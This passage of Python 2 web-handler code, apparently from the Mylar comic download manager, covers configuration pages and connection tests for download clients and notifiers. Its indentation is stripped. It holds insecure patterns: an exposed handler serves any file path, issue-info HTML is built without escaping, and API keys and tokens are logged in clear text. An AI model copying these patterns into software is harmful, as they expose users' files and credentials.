raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % comicid)
manual_annual_add.exposed = True
def comic_config(self, com_location, ComicID, alt_search=None, fuzzy_year=None, comic_version=None, force_continuing=None, force_type=None, alt_filename=None, allow_packs=None, corrected_seriesyear=None, torrentid_32p=None):
myDB = db.DBConnection()
chk1 = myDB.selectone('SELECT ComicLocation, Corrected_Type FROM comics WHERE ComicID=?', [ComicID]).fetchone()
if chk1[0] is None:
orig_location = com_location
else:
orig_location = chk1[0]
if chk1[1] is None:
orig_type = None
else:
orig_type = chk1[1]
#--- this is for multiple search terms............
#--- works, just need to redo search.py to accommodate multiple search terms
ffs_alt = []
if alt_search is not None and '##' in alt_search:
ffs = alt_search.find('##')
ffs_alt.append(alt_search[:ffs])
ffs_alt_st = str(ffs_alt[0])
ffs_test = alt_search.split('##')
if len(ffs_test) > 0:
ffs_count = len(ffs_test)
n=1
while (n < ffs_count):
ffs_alt.append(ffs_test[n])
ffs_alt_st = str(ffs_alt_st) + "..." + str(ffs_test[n])
n+=1
asearch = ffs_alt
else:
asearch = alt_search
asearch = str(alt_search)
controlValueDict = {'ComicID': ComicID}
newValues = {}
if asearch is not None:
if re.sub(r'\s', '', asearch) == '':
newValues['AlternateSearch'] = "None"
else:
newValues['AlternateSearch'] = str(asearch)
else:
newValues['AlternateSearch'] = "None"
if fuzzy_year is None:
newValues['UseFuzzy'] = "0"
else:
newValues['UseFuzzy'] = str(fuzzy_year)
if corrected_seriesyear is not None:
newValues['Corrected_SeriesYear'] = str(corrected_seriesyear)
newValues['ComicYear'] = str(corrected_seriesyear)
if comic_version is None or comic_version == 'None':
newValues['ComicVersion'] = "None"
else:
if comic_version[1:].isdigit() and comic_version[:1].lower() == 'v':
newValues['ComicVersion'] = str(comic_version)
else:
logger.info("Invalid Versioning entered - it must be in the format of v#")
newValues['ComicVersion'] = "None"
if force_continuing is None:
newValues['ForceContinuing'] = 0
else:
newValues['ForceContinuing'] = 1
if force_type == '1':
newValues['Corrected_Type'] = 'TPB'
elif force_type == '2':
newValues['Corrected_Type'] = 'Print'
else:
newValues['Corrected_Type'] = None
if orig_type != force_type:
if '$Type' in mylar.CONFIG.FOLDER_FORMAT and com_location == orig_location:
#rename folder to accommodate new forced TPB format.
import filers
x = filers.FileHandlers(ComicID=ComicID)
newcom_location = x.folder_create(booktype=newValues['Corrected_Type'])
if newcom_location is not None:
com_location = newcom_location
if allow_packs is None:
newValues['AllowPacks'] = 0
else:
newValues['AllowPacks'] = 1
newValues['TorrentID_32P'] = torrentid_32p
if alt_filename is None or alt_filename == 'None':
newValues['AlternateFileName'] = "None"
else:
newValues['AlternateFileName'] = str(alt_filename)
#force the check/creation of directory com_location here
updatedir = True
if any([mylar.CONFIG.CREATE_FOLDERS is True, os.path.isdir(orig_location)]):
if os.path.isdir(str(com_location)):
logger.info(u"Validating Directory (" + str(com_location) + "). Already exists! Continuing...")
else:
if orig_location != com_location and os.path.isdir(orig_location) is True:
logger.fdebug('Renaming existing location [%s] to new location: %s' % (orig_location, com_location))
try:
os.rename(orig_location, com_location)
except Exception as e:
if 'No such file or directory' in str(e):
checkdirectory = filechecker.validateAndCreateDirectory(com_location, True)
if not checkdirectory:
logger.warn('Error trying to validate/create directory. Aborting this process at this time.')
updatedir = False
else:
logger.warn('Unable to rename existing directory: %s' % e)
updatedir = False
else:
if orig_location != com_location and os.path.isdir(orig_location) is False:
logger.fdebug("Original Directory (%s) doesn't exist! - attempting to create new directory (%s)" % (orig_location, com_location))
else:
logger.fdebug("Updated Directory doesn't exist! - attempting to create now.")
checkdirectory = filechecker.validateAndCreateDirectory(com_location, True)
if not checkdirectory:
logger.warn('Error trying to validate/create directory. Aborting this process at this time.')
updatedir = False
else:
logger.info('[Create directories False] Not creating physical directory, but updating series location in dB to: %s' % com_location)
if updatedir is True:
newValues['ComicLocation'] = com_location
myDB.upsert("comics", newValues, controlValueDict)
logger.fdebug('Updated Series options!')
raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % ComicID)
comic_config.exposed = True
def readlistOptions(self, send2read=0, tab_enable=0, tab_host=None, tab_user=None, tab_pass=None, tab_directory=None, maintainseriesfolder=0):
mylar.CONFIG.SEND2READ = bool(int(send2read))
mylar.CONFIG.MAINTAINSERIESFOLDER = bool(int(maintainseriesfolder))
mylar.CONFIG.TAB_ENABLE = bool(int(tab_enable))
mylar.CONFIG.TAB_HOST = tab_host
mylar.CONFIG.TAB_USER = tab_user
mylar.CONFIG.TAB_PASS = tab_pass
mylar.CONFIG.TAB_DIRECTORY = tab_directory
readoptions = {'send2read': mylar.CONFIG.SEND2READ,
'maintainseriesfolder': mylar.CONFIG.MAINTAINSERIESFOLDER,
'tab_enable': mylar.CONFIG.TAB_ENABLE,
'tab_host': mylar.CONFIG.TAB_HOST,
'tab_user': mylar.CONFIG.TAB_USER,
'tab_pass': mylar.CONFIG.TAB_PASS,
'tab_directory': mylar.CONFIG.TAB_DIRECTORY}
mylar.CONFIG.writeconfig(values=readoptions)
raise cherrypy.HTTPRedirect("readlist")
readlistOptions.exposed = True
def arcOptions(self, StoryArcID=None, StoryArcName=None, read2filename=0, storyarcdir=0, arc_folderformat=None, copy2arcdir=0, arc_fileops='copy'):
mylar.CONFIG.READ2FILENAME = bool(int(read2filename))
mylar.CONFIG.STORYARCDIR = bool(int(storyarcdir))
if arc_folderformat is None:
mylar.CONFIG.ARC_FOLDERFORMAT = "($arc) ($spanyears)"
else:
mylar.CONFIG.ARC_FOLDERFORMAT = arc_folderformat
mylar.CONFIG.COPY2ARCDIR = bool(int(copy2arcdir))
mylar.CONFIG.ARC_FILEOPS = arc_fileops
options = {'read2filename': mylar.CONFIG.READ2FILENAME,
'storyarcdir': mylar.CONFIG.STORYARCDIR,
'arc_folderformat': mylar.CONFIG.ARC_FOLDERFORMAT,
'copy2arcdir': mylar.CONFIG.COPY2ARCDIR,
'arc_fileops': mylar.CONFIG.ARC_FILEOPS}
mylar.CONFIG.writeconfig(values=options)
#force the check/creation of directory com_location here
if mylar.CONFIG.STORYARCDIR is True:
arcdir = os.path.join(mylar.CONFIG.DESTINATION_DIR, 'StoryArcs')
if os.path.isdir(arcdir):
logger.info('Validating Directory (%s). Already exists! Continuing...' % arcdir)
else:
logger.fdebug('Storyarc Directory doesn\'t exist! Attempting to create now.')
checkdirectory = filechecker.validateAndCreateDirectory(arcdir, True)
if not checkdirectory:
logger.warn('Error trying to validate/create directory. Aborting this process at this time.')
return
if StoryArcID is not None:
raise cherrypy.HTTPRedirect("detailStoryArc?StoryArcID=%s&StoryArcName=%s" % (StoryArcID, StoryArcName))
else:
raise cherrypy.HTTPRedirect("storyarc_main")
arcOptions.exposed = True
def configUpdate(self, **kwargs):
checked_configs = ['enable_https', 'launch_browser', 'syno_fix', 'auto_update', 'annuals_on', 'api_enabled', 'nzb_startup_search',
'enforce_perms', 'sab_to_mylar', 'torrent_local', 'torrent_seedbox', 'rtorrent_ssl', 'rtorrent_verify', 'rtorrent_startonload',
'enable_torrents', 'enable_rss', 'nzbsu', 'nzbsu_verify',
'dognzb', 'dognzb_verify', 'experimental', 'enable_torrent_search', 'enable_32p', 'enable_torznab',
'newznab', 'use_minsize', 'use_maxsize', 'ddump', 'failed_download_handling', 'sab_client_post_processing', 'nzbget_client_post_processing',
'failed_auto', 'post_processing', 'enable_check_folder', 'enable_pre_scripts', 'enable_snatch_script', 'enable_extra_scripts',
'enable_meta', 'cbr2cbz_only', 'ct_tag_cr', 'ct_tag_cbl', 'ct_cbz_overwrite', 'rename_files', 'replace_spaces', 'zero_level',
'lowercase_filenames', 'autowant_upcoming', 'autowant_all', 'comic_cover_local', 'alternate_latest_series_covers', 'cvinfo', 'snatchedtorrent_notify',
'prowl_enabled', 'prowl_onsnatch', 'pushover_enabled', 'pushover_onsnatch', 'boxcar_enabled',
'boxcar_onsnatch', 'pushbullet_enabled', 'pushbullet_onsnatch', 'telegram_enabled', 'telegram_onsnatch', 'slack_enabled', 'slack_onsnatch',
'email_enabled', 'email_enc', 'email_ongrab', 'email_onpost', 'opds_enable', 'opds_authentication', 'opds_metainfo', 'opds_pagesize', 'enable_ddl', 'deluge_pause'] #enable_public
for checked_config in checked_configs:
if checked_config not in kwargs:
kwargs[checked_config] = False
for k, v in kwargs.iteritems():
try:
_conf = mylar.CONFIG._define(k)
except KeyError:
continue
mylar.CONFIG.EXTRA_NEWZNABS = []
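# newznab providers arrive as numbered kwargs (newznab_name<N>, newznab_host<N>, ...);
# rebuild EXTRA_NEWZNABS as one (name, host, verify, api, uid, enabled) tuple per provider.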
for kwarg in [x for x in kwargs if x.startswith('newznab_name')]:
if kwarg.startswith('newznab_name'):
newznab_number = kwarg[12:]
newznab_name = kwargs['newznab_name' + newznab_number]
if newznab_name == "":
newznab_name = kwargs['newznab_host' + newznab_number]
if newznab_name == "":
continue
newznab_host = helpers.clean_url(kwargs['newznab_host' + newznab_number])
try:
newznab_verify = kwargs['newznab_verify' + newznab_number]
except:
newznab_verify = 0
newznab_api = kwargs['newznab_api' + newznab_number]
newznab_uid = kwargs['newznab_uid' + newznab_number]
try:
newznab_enabled = str(kwargs['newznab_enabled' + newznab_number])
except KeyError:
newznab_enabled = '0'
del kwargs[kwarg]
mylar.CONFIG.EXTRA_NEWZNABS.append((newznab_name, newznab_host, newznab_verify, newznab_api, newznab_uid, newznab_enabled))
mylar.CONFIG.EXTRA_TORZNABS = []
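# torznab entries are rebuilt the same way, as (name, host, verify, api, category, enabled) tuples.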
for kwarg in [x for x in kwargs if x.startswith('torznab_name')]:
if kwarg.startswith('torznab_name'):
torznab_number = kwarg[12:]
torznab_name = kwargs['torznab_name' + torznab_number]
if torznab_name == "":
torznab_name = kwargs['torznab_host' + torznab_number]
if torznab_name == "":
continue
torznab_host = helpers.clean_url(kwargs['torznab_host' + torznab_number])
try:
torznab_verify = kwargs['torznab_verify' + torznab_number]
except:
torznab_verify = 0
torznab_api = kwargs['torznab_apikey' + torznab_number]
torznab_category = kwargs['torznab_category' + torznab_number]
try:
torznab_enabled = str(kwargs['torznab_enabled' + torznab_number])
except KeyError:
torznab_enabled = '0'
del kwargs[kwarg]
mylar.CONFIG.EXTRA_TORZNABS.append((torznab_name, torznab_host, torznab_verify, torznab_api, torznab_category, torznab_enabled))
mylar.CONFIG.process_kwargs(kwargs)
#this makes sure things are set to the default values if they're not appropriately set.
mylar.CONFIG.configure(update=True, startup=False)
# Write the config
logger.info('Now saving config...')
mylar.CONFIG.writeconfig()
configUpdate.exposed = True
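# SABtest: verify connectivity to SABnzbd and confirm the supplied API key is the
# full API key (auto-retrieving it via sabparse when possible); the config still
# has to be saved afterwards for the key/version to persist.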
def SABtest(self, sabhost=None, sabusername=None, sabpassword=None, sabapikey=None):
if sabhost is None:
sabhost = mylar.CONFIG.SAB_HOST
if sabusername is None:
sabusername = mylar.CONFIG.SAB_USERNAME
if sabpassword is None:
sabpassword = mylar.CONFIG.SAB_PASSWORD
if sabapikey is None:
sabapikey = mylar.CONFIG.SAB_APIKEY
logger.fdebug('Now attempting to test SABnzbd connection')
#if user/pass given, we can auto-fill the API ;)
if sabusername is None or sabpassword is None:
logger.error('No Username / Password provided for SABnzbd credentials. Unable to test API key')
return "Invalid Username/Password provided"
logger.fdebug('testing connection to SABnzbd @ ' + sabhost)
if not sabhost.endswith('/'):
sabhost = sabhost + '/'
querysab = sabhost + 'api'
payload = {'mode': 'get_config',
'section': 'misc',
'output': 'json',
'keyword': 'api_key',
'apikey': sabapikey}
if sabhost.startswith('https'):
verify = True
else:
verify = False
version = 'Unknown'
try:
v = requests.get(querysab, params={'mode': 'version'}, verify=verify)
if str(v.status_code) == '200':
logger.fdebug('sabnzbd version: %s' % v.content)
version = v.text
r = requests.get(querysab, params=payload, verify=verify)
except Exception, e:
logger.warn('Error fetching data from %s: %s' % (querysab, e))
if isinstance(e, requests.exceptions.SSLError):
logger.warn('Cannot verify ssl certificate. Attempting to authenticate with no ssl-certificate verification.')
try:
from requests.packages.urllib3 import disable_warnings
disable_warnings()
except:
logger.warn('Unable to disable https warnings. Expect some spam if using https nzb providers.')
verify = False
try:
v = requests.get(querysab, params={'mode': 'version'}, verify=verify)
if str(v.status_code) == '200':
logger.fdebug('sabnzbd version: %s' % v.text)
version = v.text
r = requests.get(querysab, params=payload, verify=verify)
except Exception, e:
logger.warn('Error fetching data from %s: %s' % (sabhost, e))
return 'Unable to retrieve data from SABnzbd'
else:
return 'Unable to retrieve data from SABnzbd'
logger.fdebug('status code: ' + str(r.status_code))
if str(r.status_code) != '200':
logger.warn('Unable to properly query SABnzbd @' + sabhost + ' [Status Code returned: ' + str(r.status_code) + ']')
data = False
else:
data = r.json()
q_apikey = None
try:
q_apikey = data['config']['misc']['api_key']
except:
logger.error('Error detected attempting to retrieve SAB data using FULL APIKey')
if all([sabusername is not None, sabpassword is not None]):
try:
sp = sabparse.sabnzbd(sabhost, sabusername, sabpassword)
q_apikey = sp.sab_get()
except Exception, e:
logger.warn('Error fetching data from %s: %s' % (sabhost, e))
if q_apikey is None:
return "Invalid APIKey provided"
mylar.CONFIG.SAB_APIKEY = q_apikey
logger.info('APIKey provided is the FULL APIKey which is the correct key. You still need to SAVE the config for the changes to be applied.')
logger.info('Connection to SABnzbd tested successfully')
mylar.CONFIG.SAB_VERSION = version
return json.dumps({"status": "Successfully verified APIkey.", "version": str(version)})
SABtest.exposed = True
def NZBGet_test(self, nzbhost=None, nzbport=None, nzbusername=None, nzbpassword=None):
if nzbhost is None:
nzbhost = mylar.CONFIG.NZBGET_HOST
if nzbport is None:
nzbport = mylar.CONFIG.NZBGET_PORT
if nzbusername is None:
nzbusername = mylar.CONFIG.NZBGET_USERNAME
if nzbpassword is None:
nzbpassword = mylar.CONFIG.NZBGET_PASSWORD
logger.fdebug('Now attempting to test NZBGet connection')
logger.info('Now testing connection to NZBGet @ %s:%s' % (nzbhost, nzbport))
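# assemble the xmlrpc endpoint as protocol://[user[:pass]@]host:port/xmlrpc,
# embedding credentials only when they were supplied.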
if nzbhost[:5] == 'https':
protocol = 'https'
nzbgethost = nzbhost[8:]
elif nzbhost[:4] == 'http':
protocol = 'http'
nzbgethost = nzbhost[7:]
else:
protocol = 'http'
nzbgethost = nzbhost
url = '%s://'
nzbparams = protocol,
if all([nzbusername is not None, nzbpassword is not None]):
url = url + '%s:%s@'
nzbparams = nzbparams + (nzbusername, nzbpassword)
elif nzbusername is not None:
url = url + '%s@'
nzbparams = nzbparams + (nzbusername,)
url = url + '%s:%s/xmlrpc'
nzbparams = nzbparams + (nzbgethost, nzbport,)
nzb_url = (url % nzbparams)
import xmlrpclib
nzbserver = xmlrpclib.ServerProxy(nzb_url)
try:
r = nzbserver.status()
except Exception as e:
logger.warn('Error fetching data: %s' % e)
return 'Unable to retrieve data from NZBGet'
logger.info('Successfully verified connection to NZBGet at %s:%s' % (nzbgethost, nzbport))
return "Successfully verified connection to NZBGet"
NZBGet_test.exposed = True
def shutdown(self):
mylar.SIGNAL = 'shutdown'
message = 'Shutting Down...'
return serve_template(templatename="shutdown.html", title="Shutting Down", message=message, timer=15)
shutdown.exposed = True
def restart(self):
mylar.SIGNAL = 'restart'
message = 'Restarting...'
return serve_template(templatename="shutdown.html", title="Restarting", message=message, timer=30)
restart.exposed = True
def update(self):
mylar.SIGNAL = 'update'
message = 'Updating...<br/><small>Main screen will appear in 60s</small>'
return serve_template(templatename="shutdown.html", title="Updating", message=message, timer=30)
update.exposed = True
def getInfo(self, ComicID=None, IssueID=None):
from mylar import cache
info_dict = cache.getInfo(ComicID, IssueID)
return simplejson.dumps(info_dict)
getInfo.exposed = True
def getComicArtwork(self, ComicID=None, imageURL=None):
from mylar import cache
logger.info(u"Retrieving image for : " + comicID)
return cache.getArtwork(ComicID, imageURL)
getComicArtwork.exposed = True
def findsabAPI(self, sabhost=None, sabusername=None, sabpassword=None):
sp = sabparse.sabnzbd(sabhost, sabusername, sabpassword)
sabapi = sp.sab_get()
logger.info('SAB APIKey found as : ' + str(sabapi) + '. You still have to save the config to retain this setting.')
mylar.CONFIG.SAB_APIKEY = sabapi
return sabapi
findsabAPI.exposed = True
def generateAPI(self):
import hashlib, random
apikey = hashlib.sha224(str(random.getrandbits(256))).hexdigest()[0:32]
logger.info("New API generated")
mylar.CONFIG.API_KEY = apikey
return apikey
generateAPI.exposed = True
def api(self, *args, **kwargs):
from mylar.api import Api
a = Api()
a.checkParams(*args, **kwargs)
data = a.fetchData()
return data
api.exposed = True
def opds(self, *args, **kwargs):
from mylar.opds import OPDS
op = OPDS()
op.checkParams(*args, **kwargs)
data = op.fetchData()
return data
opds.exposed = True
def downloadthis(self, pathfile=None):
#pathfile should be escaped via the |u tag from within the html call already.
logger.fdebug('filepath to retrieve file from is : ' + pathfile)
from cherrypy.lib.static import serve_download
return serve_download(pathfile)
downloadthis.exposed = True
def IssueInfo(self, filelocation, comicname=None, issue=None, date=None, title=None):
filelocation = filelocation.encode('ASCII')
filelocation = urllib.unquote_plus(filelocation).decode('utf8')
issuedetails = helpers.IssueDetails(filelocation)
if issuedetails:
issueinfo = '<table width="500"><tr><td>'
issueinfo += '<img style="float: left; padding-right: 10px" src=' + issuedetails[0]['IssueImage'] + ' height="400" width="263">'
seriestitle = issuedetails[0]['series']
if any([seriestitle == 'None', seriestitle is None]):
seriestitle = comicname
issuenumber = issuedetails[0]['issue_number']
if any([issuenumber == 'None', issuenumber is None]):
issuenumber = issue
issuetitle = issuedetails[0]['title']
if any([issuetitle == 'None', issuetitle is None]):
issuetitle = title
issueinfo += '<h1><center><b>' + seriestitle + '</br>[#' + issuenumber + ']</b></center></h1>'
issueinfo += '<center>"' + issuetitle + '"</center></br>'
issueinfo += '</br><p class="alignleft">' + str(issuedetails[0]['pagecount']) + ' pages</p>'
if all([issuedetails[0]['day'] is None, issuedetails[0]['month'] is None, issuedetails[0]['year'] is None]):
issueinfo += '<p class="alignright">(' + str(date) + ')</p></br>'
else:
issueinfo += '<p class="alignright">(' + str(issuedetails[0]['year']) + '-' + str(issuedetails[0]['month']) + '-' + str(issuedetails[0]['day']) + ')</p></br>'
if not any([issuedetails[0]['writer'] == 'None', issuedetails[0]['writer'] is None]):
issueinfo += 'Writer: ' + issuedetails[0]['writer'] + '</br>'
if not any([issuedetails[0]['penciller'] == 'None', issuedetails[0]['penciller'] is None]):
issueinfo += 'Penciller: ' + issuedetails[0]['penciller'] + '</br>'
if not any([issuedetails[0]['inker'] == 'None', issuedetails[0]['inker'] is None]):
issueinfo += 'Inker: ' + issuedetails[0]['inker'] + '</br>'
if not any([issuedetails[0]['colorist'] == 'None', issuedetails[0]['colorist'] is None]):
issueinfo += 'Colorist: ' + issuedetails[0]['colorist'] + '</br>'
if not any([issuedetails[0]['letterer'] == 'None', issuedetails[0]['letterer'] is None]):
issueinfo += 'Letterer: ' + issuedetails[0]['letterer'] + '</br>'
if not any([issuedetails[0]['editor'] == 'None', issuedetails[0]['editor'] is None]):
issueinfo += 'Editor: ' + issuedetails[0]['editor'] + '</br>'
issueinfo += '</td></tr>'
#issueinfo += '<img src="interfaces/default/images/rename.png" height="25" width="25"></td></tr>'
issuesumm = None
if any([issuedetails[0]['summary'] == 'None', issuedetails[0]['summary'] is None]):
issuesumm = 'No summary available within metatagging.'
else:
if len(issuedetails[0]['summary']) > 1000:
issuesumm = issuedetails[0]['summary'][:1000] + '...'
else:
issuesumm = issuedetails[0]['summary']
issueinfo += '<tr><td>Summary: ' + issuesumm + '</br></td></tr>'
issueinfo += '<tr><td><center>' + os.path.split(filelocation)[1] + '</center>'
issueinfo += '</td></tr></table>'
else:
ErrorPNG = 'interfaces/default/images/symbol_exclamation.png'
issueinfo = '<table width="300"><tr><td>'
issueinfo += '<img style="float: left; padding-right: 10px" src=' + ErrorPNG + ' height="128" width="128">'
issueinfo += '<h1><center><b>ERROR</b></center></h1></br>'
issueinfo += '<center>Unable to retrieve metadata from within cbz file</center></br>'
issueinfo += '<center>Maybe you should try and tag the file again?</center></br>'
issueinfo += '<tr><td><center>' + os.path.split(filelocation)[1] + '</center>'
issueinfo += '</td></tr></table>'
return issueinfo
IssueInfo.exposed = True
def manual_metatag(self, dirName, issueid, filename, comicid, comversion, seriesyear=None, group=False):
module = '[MANUAL META-TAGGING]'
try:
import cmtagmylar
if mylar.CONFIG.CMTAG_START_YEAR_AS_VOLUME:
if all([seriesyear is not None, seriesyear != 'None']):
vol_label = seriesyear
else:
logger.warn('Cannot populate the year for the series for some reason. Dropping down to numeric volume label.')
vol_label = comversion
else:
vol_label = comversion
metaresponse = cmtagmylar.run(dirName, issueid=issueid, filename=filename, comversion=vol_label, manualmeta=True)
except ImportError:
logger.warn(module + ' comictaggerlib not found on system. Ensure the ENTIRE lib directory is located within mylar/lib/comictaggerlib/ directory.')
metaresponse = "fail"
if metaresponse == "fail":
logger.fdebug(module + ' Unable to write metadata successfully - check mylar.log file.')
return
elif metaresponse == "unrar error":
logger.error(module + ' This is a corrupt archive - whether CRC errors or it is incomplete. Marking as BAD, and retrying a different copy.')
return
#launch failed download handling here.
else:
dst = os.path.join(dirName, os.path.split(metaresponse)[1])
fail = False
try:
shutil.copy(metaresponse, dst)
logger.info('%s Successfully wrote metadata to .cbz (%s) - Continuing..' % (module, os.path.split(metaresponse)[1]))
except Exception as e:
if str(e.errno) == '2':
try:
if mylar.CONFIG.MULTIPLE_DEST_DIRS is not None and mylar.CONFIG.MULTIPLE_DEST_DIRS != 'None' and os.path.join(mylar.CONFIG.MULTIPLE_DEST_DIRS, os.path.basename(dirName)) != dirName:
dst = os.path.join(mylar.CONFIG.MULTIPLE_DEST_DIRS, os.path.basename(dirName))
shutil.copy(metaresponse, dst)
logger.info('%s Successfully wrote metadata to .cbz (%s) - Continuing..' % (module, os.path.split(metaresponse)[1]))
except Exception as e:
logger.warn('%s [%s] Unable to complete metatagging : %s [%s]' % (module, dst, e, e.errno))
fail = True
else:
logger.warn('%s [%s] Unable to complete metatagging : %s [%s]' % (module, dst, e, e.errno))
fail = True
cache_dir = os.path.split(metaresponse)[0]
if os.path.isfile(metaresponse):
try:
os.remove(metaresponse)
except OSError:
pass
if not os.listdir(cache_dir):
logger.fdebug('%s Tidying up. Deleting temporary cache directory: %s' % (module, cache_dir))
try:
shutil.rmtree(cache_dir)
except Exception as e:
logger.warn(module + ' Unable to remove temporary directory: %s' % cache_dir)
else:
logger.fdebug('Temporary cache directory not empty - leaving in place: %s' % cache_dir)
if filename is not None:
if os.path.isfile(filename) and os.path.split(filename)[1].lower() != os.path.split(metaresponse)[1].lower():
try:
logger.fdebug('%s Removing original filename: %s' % (module, filename))
os.remove(filename)
except OSError:
pass
if any([group is False, fail is False]):
updater.forceRescan(comicid)
manual_metatag.exposed = True
def group_metatag(self, ComicID, dirName=None):
myDB = db.DBConnection()
cinfo = myDB.selectone('SELECT ComicLocation, ComicVersion, ComicYear, ComicName FROM comics WHERE ComicID=?', [ComicID]).fetchone()
groupinfo = myDB.select('SELECT * FROM issues WHERE ComicID=? and Location is not NULL', [ComicID])
if groupinfo is None:
logger.warn('No issues physically exist within the series directory for me to (re)-tag.')
return
if dirName is None:
meta_dir = cinfo['ComicLocation']
else:
meta_dir = dirName
for ginfo in groupinfo:
#if multiple_dest_dirs is in effect, metadir will be pointing to the wrong location and cause a 'Unable to create temporary cache location' error message
self.manual_metatag(meta_dir, ginfo['IssueID'], os.path.join(meta_dir, ginfo['Location']), ComicID, comversion=cinfo['ComicVersion'], seriesyear=cinfo['ComicYear'], group=True)
updater.forceRescan(ComicID)
logger.info('[SERIES-METATAGGER][' + cinfo['ComicName'] + ' (' + cinfo['ComicYear'] + ')] Finished doing a complete series (re)tagging of metadata.')
group_metatag.exposed = True
def CreateFolders(self, createfolders=None):
if createfolders:
mylar.CONFIG.CREATE_FOLDERS = int(createfolders)
#mylar.config_write()
CreateFolders.exposed = True
def getPushbulletDevices(self, api=None):
notifythis = notifiers.pushbullet
result = notifythis.get_devices(api)
if result:
return result
else:
return 'Error sending Pushbullet notifications.'
getPushbulletDevices.exposed = True
def syncfiles(self):
#3 statuses exist for the readlist.
# Added (Not Read) - Issue is added to the readlist and is awaiting to be 'sent' to your reading client.
# Read - Issue has been read
# Not Read - Issue has been downloaded to your reading client after the syncfiles has taken place.
read = readinglist.Readinglist()
threading.Thread(target=read.syncreading).start()
syncfiles.exposed = True
def search_32p(self, search=None):
return mylar.rsscheck.torrents(pickfeed='4', seriesname=search)
search_32p.exposed = True
def testprowl(self):
prowl = notifiers.prowl()
result = prowl.test_notify()
if result:
return "Successfully sent Prowl test - check to make sure it worked"
else:
return "Error sending test message to Prowl"
testprowl.exposed = True
def testboxcar(self):
boxcar = notifiers.boxcar()
result = boxcar.test_notify()
if result:
return "Successfully sent Boxcar test - check to make sure it worked"
else:
return "Error sending test message to Boxcar"
testboxcar.exposed = True
def testpushover(self, apikey, userkey, device):
pushover = notifiers.PUSHOVER(test_apikey=apikey, test_userkey=userkey, test_device=device)
result = pushover.test_notify()
if result == True:
return "Successfully sent PushOver test - check to make sure it worked"
else:
logger.warn('Last six characters of the test variables used [APIKEY: %s][USERKEY: %s]' % (apikey[-6:], userkey[-6:]))
return "Error sending test message to Pushover"
testpushover.exposed = True
def testpushbullet(self, apikey):
pushbullet = notifiers.PUSHBULLET(test_apikey=apikey)
result = pushbullet.test_notify()
if result['status'] == True:
return result['message']
else:
logger.warn('APIKEY used for test was : %s' % apikey)
return result['message']
testpushbullet.exposed = True
def testtelegram(self, userid, token):
telegram = notifiers.TELEGRAM(test_userid=userid, test_token=token)
result = telegram.test_notify()
if result == True:
return "Successfully sent Telegram test - check to make sure it worked"
else:
logger.warn('Test variables used [USERID: %s][TOKEN: %s]' % (userid, token))
return "Error sending test message to Telegram"
testtelegram.exposed = True
def testslack(self, webhook_url):
slack = notifiers.SLACK(test_webhook_url=webhook_url)
result = slack.test_notify()
if result == True:
return "Successfully sent Slack test - check to make sure it worked"
else:
logger.warn('Test variables used [WEBHOOK_URL: %s]' % webhook_url)
return "Error sending test message to Slack"
testslack.exposed = True
def testemail(self, emailfrom, emailto, emailsvr, emailport, emailuser, emailpass, emailenc):
email = notifiers.EMAIL(test_emailfrom=emailfrom, test_emailto=emailto, test_emailsvr=emailsvr, test_emailport=emailport, test_emailuser=emailuser, test_emailpass=emailpass, test_emailenc=emailenc)
result = email.test_notify()
if result == True:
return "Successfully sent email. Check your mailbox."
else:
logger.warn('Email test has gone horribly wrong. Variables used were [FROM: %s] [TO: %s] [SERVER: %s] [PORT: %s] [USER: %s] [PASSWORD: ********] [ENCRYPTION: %s]' % (emailfrom, emailto, emailsvr, emailport, emailuser, emailenc))
return "Error sending test message via email"
testemail.exposed = True
def testrtorrent(self, host, username, password, auth, verify, rpc_url):
import torrent.clients.rtorrent as TorClient
client = TorClient.TorrentClient()
ca_bundle = None
if mylar.CONFIG.RTORRENT_CA_BUNDLE is not None:
ca_bundle = mylar.CONFIG.RTORRENT_CA_BUNDLE
rclient = client.connect(host, username, password, auth, verify, rpc_url, ca_bundle, test=True)
if not rclient:
logger.warn('Could not establish connection to %s' % host)
return '[rTorrent] Error establishing connection to Rtorrent'
else:
if rclient['status'] is False:
logger.warn('[rTorrent] Could not establish connection to %s. Error returned: %s' % (host, rclient['error']))
return 'Error establishing connection to rTorrent'
else:
logger.info('[rTorrent] Successfully validated connection to %s [v%s]' % (host, rclient['version']))
return 'Successfully validated rTorrent connection'
testrtorrent.exposed = True
def testqbit(self, host, username, password):
import torrent.clients.qbittorrent as QbitClient
qc = QbitClient.TorrentClient()
qclient = qc.connect(host, username, password, True)
if not qclient:
logger.warn('[qBittorrent] Could not establish connection to %s' % host)
return 'Error establishing connection to Qbittorrent'
else:
if qclient['status'] is False:
logger.warn('[qBittorrent] Could not establish connection to %s. Error returned: %s' % (host, qclient['error']))
return 'Error establishing connection to Qbittorrent'
else:
logger.info('[qBittorrent] Successfully validated connection to %s [v%s]' % (host, qclient['version']))
return 'Successfully validated qBittorrent connection'
testqbit.exposed = True
def testdeluge(self, host, username, password):
import torrent.clients.deluge as DelugeClient
client = DelugeClient.TorrentClient()
dclient = client.connect(host, username, password, True)
if not dclient:
logger.warn('[Deluge] Could not establish connection to %s' % host)
return 'Error establishing connection to Deluge'
else:
if dclient['status'] is False:
logger.warn('[Deluge] Could not establish connection to %s. Error returned: %s' % (host, dclient['error']))
return 'Error establishing connection to Deluge'
else:
logger.info('[Deluge] Successfully validated connection to %s [daemon v%s; libtorrent v%s]' % (host, dclient['daemon_version'], dclient['libtorrent_version']))
return 'Successfully validated Deluge connection'
testdeluge.exposed = True
def testnewznab(self, name, host, ssl, apikey):
logger.fdebug('ssl/verify: %s' % ssl)
if ssl == '0' or ssl == '1':
ssl = bool(int(ssl))
else:
if ssl == 'false':
ssl = False
else:
ssl = True
result = helpers.newznab_test(name, host, ssl, apikey)
if result is True:
logger.info('Successfully tested %s [%s] - valid api response received' % (name, host))
return 'Successfully tested %s!' % name
else:
logger.warn('Testing failed to %s [HOST:%s][SSL:%s]' % (name, host, bool(ssl)))
return 'Error - failed running test for %s' % name
testnewznab.exposed = True
def testtorznab(self, name, host, ssl, apikey):
logger.fdebug('ssl/verify: %s' % ssl)
if ssl == '0' or ssl == '1':
ssl = bool(int(ssl))
else:
if ssl == 'false':
ssl = False
else:
ssl = True
result = helpers.torznab_test(name, host, ssl, apikey)
if result is True:
logger.info('Successfully tested %s [%s] - valid api response received' % (name, host))
return 'Successfully tested %s!' % name
else:
print result
logger.warn('Testing failed to %s [HOST:%s][SSL:%s]' % (name, host, bool(ssl)))
return 'Error - failed running test for %s' % name
testtorznab.exposed = True
def orderThis(self, **kwargs):
return
orderThis.exposed = True
